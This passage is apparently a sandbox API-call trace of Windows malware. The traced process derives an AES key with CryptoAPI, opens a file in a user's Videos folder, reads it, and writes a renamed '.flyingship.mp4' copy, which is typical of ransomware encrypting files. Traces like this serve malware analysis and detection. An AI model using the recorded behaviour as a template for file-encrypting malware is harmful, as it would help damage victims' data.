lpMsg=0x87eebc) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.553] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0198.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.553] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.553] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.553] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.553] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.554] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.554] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.554] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.554] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.554] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.554] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.554] CryptHashData (hHash=0x90ae18, pbData=0x8dec18, dwDataLen=0x19, dwFlags=0x1) returned 1 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.554] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.555] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0198.555] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.555] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.555] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0198.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.556] CryptDestroyHash (hHash=0x90ae18) returned 1 [0198.556] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.556] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.556] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\zegvjih7.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.557] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.557] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.557] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0198.558] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.558] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0198.558] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.559] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.559] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0198.559] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t")) returned 0x10 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.560] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0198.560] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0198.561] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\zEgvJih7.flyingship.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\zegvjih7.flyingship.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0198.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0198.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0198.561] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0198.561] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0198.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af18 [0198.562] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.562] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0198.562] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0198.563] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2480020 [0198.563] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0198.563] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x2f3c, lpOverlapped=0x0) returned 1 [0198.565] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0198.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.565] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.565] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f3c) returned 0x900190 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2480020 | out: hHeap=0x8a0000) returned 1 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0198.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0198.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2f3c) returned 0x9030d8 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x900190 | out: hHeap=0x8a0000) returned 1 [0198.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0198.576] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0198.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 